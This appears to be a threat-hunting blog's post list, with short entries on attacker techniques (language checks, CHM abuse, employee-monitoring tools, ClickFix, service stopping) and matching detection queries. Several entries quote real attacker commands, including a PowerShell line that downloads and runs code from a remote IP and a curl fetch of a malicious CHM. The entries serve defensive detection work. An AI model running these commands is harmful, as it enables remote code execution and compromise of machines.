Posts

380. Hunting for Suspicious System Language Discovery Events

Hello everyone! Sometimes, even if a victim runs a malicious file, the system may still avoid compromise. One reason for this is the use of the System Location Discovery: System Language Discovery (T1614.001) technique. The point is that in some cases attackers do not want their malware to run on systems located in certain countries. Today we’ll look at an example of how attackers restrict the download of a stealer for systems that may be located in CIS countries. So, the loader for the SHub stealer targeting macOS used the following command to obtain information about the language of the compromised system:

defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian

The AppleEnabledInputSources key in the com.apple.HIToolbox.plist file contains information about keyboard layouts. Its contents are checked for the presence of the Russian language, which is typical for CIS systems. A good detection opportunity is suspicious...

379. Hunting for Suspicious Compiled HTML Files

Hello everyone! Today we’ll take a look at a technique that isn’t very common. Nevertheless, it occasionally appears in attackers’ toolkits. This is System Binary Proxy Execution: Compiled HTML File (T1218.001). This technique is often used in the early stages of the cyberattack lifecycle. For example, attackers may distribute malicious CHM files inside archives as attachments in phishing emails. Let’s look at an example. In this case, the attackers used an archive containing a shortcut with the following command:

"C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless cmd /c curl www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png -L""skontv&hh -d""ecompile^ . nt""v&0.ln""k

In this scenario, the CHM file is downloaded from a remote web resource and extracted using Windows HTML Help (hh.exe) with the -decompile argument. In the context of threat hunting, we can look for events in...

378. Hunting for APT37: Zoho WorkDrive Abuse

Hello everyone! Today we’ll talk about another legitimate service that attackers abuse - in this case, APT37. And of course, we’ll look at how to use this information for proactive threat hunting. So, in one of APT37’s fairly recent campaigns (we track this cluster as Squid Werewolf), they used the RESTLEAF implant, which abused Zoho WorkDrive - a cloud-based file management and collaboration platform. From a proactive hunting perspective, we can identify all network communications related to Zoho WorkDrive and then separate the legitimate events:

event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com"

See you soon!

377. Adversaries Continue to Add Employee Monitoring Tools to Their Arsenal

Hello everyone! It seems the trend is indeed being confirmed: another legitimate employee monitoring tool has ended up in the arsenal of attackers. Malwarebytes reported on a campaign in which attackers disguise Teramind installers as Zoom and Google Meet updates. Teramind is a software platform for employee monitoring and workplace activity analysis. It helps companies track and analyze user actions on computers and across networks to improve security, productivity, and compliance with corporate policies. However, attackers can use such software for unauthorized access to corporate systems. First, we can look for events related to the execution of files signed by Teramind Inc., for example:

event_type: "processcreatewin" AND proc_file_sig: "teramind"

You can also check for suspicious communications with teramind[.]co:

event_type: "dnsreqwin" AND dns_rname: "teramind.co"

See you soon!

376. Another Employee Monitoring Tool is Being Used by Attackers

Hello everyone! I think we’re all used to attackers abusing remote administration tools, but it seems a new trend is emerging - the abuse of employee monitoring tools. We’ve already seen attackers use Controlio and Mipko Employee Monitor, and in a recent report by Huntress it’s noted that ransomware operators have added yet another similar tool to their arsenal - Network LookOut Net Monitor for Employees. What should you look for? For example, suspicious interaction with networklookout[.]com:

event_type: "dnsreqwin" AND dns_rname: "networklookout.com"

And, of course, process execution events whose metadata indicates this tool, for example:

event_type: "processcreatewin" AND proc_file_productname: "Net Monitor for Employees Pro"

See you soon!

375. The New ClickFix Variant: Do We Really Need To Detect It?

Hello everyone! Variants of the Malicious Copy and Paste technique (T1204.004) continue to remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities. This particular variant was shared by researchers from Microsoft Threat Intelligence. The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response:

cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

Despite the originality of the approach, the Name: field contains a fairly ordinary command:

powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex"

As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this: event_type: "processcreatewin" AND...

374. Hunting for Suspicious Service Stopping Events

Hello everyone! Today we’ll take a look at the Service Stop technique (T1489) and discuss whether it’s worth hunting for its implementation. This technique is a typical behavioral marker for ransomware and wipers. If you check ATT&CK, you’ll see plenty of examples. Typically, such malware is used at the very end of the cyberattack lifecycle and is hardly a good target for proactive threat hunting. However, there are always exceptions. Let’s take a look at the Prometei botnet. During the malware installation process, it stops the WinRM service and then disables it:

sc stop WinRM
sc config WinRM start= disabled

Why is this done? For example, it makes remote administration more difficult. Could such activity be legitimate? Of course! Therefore, this behavioral marker can be a reasonable target for proactive hunting:

event_type: "processcreatewin" AND proc_file_path: "sc.exe" AND cmdline: ("winrm" AND "disabled")

See you soon!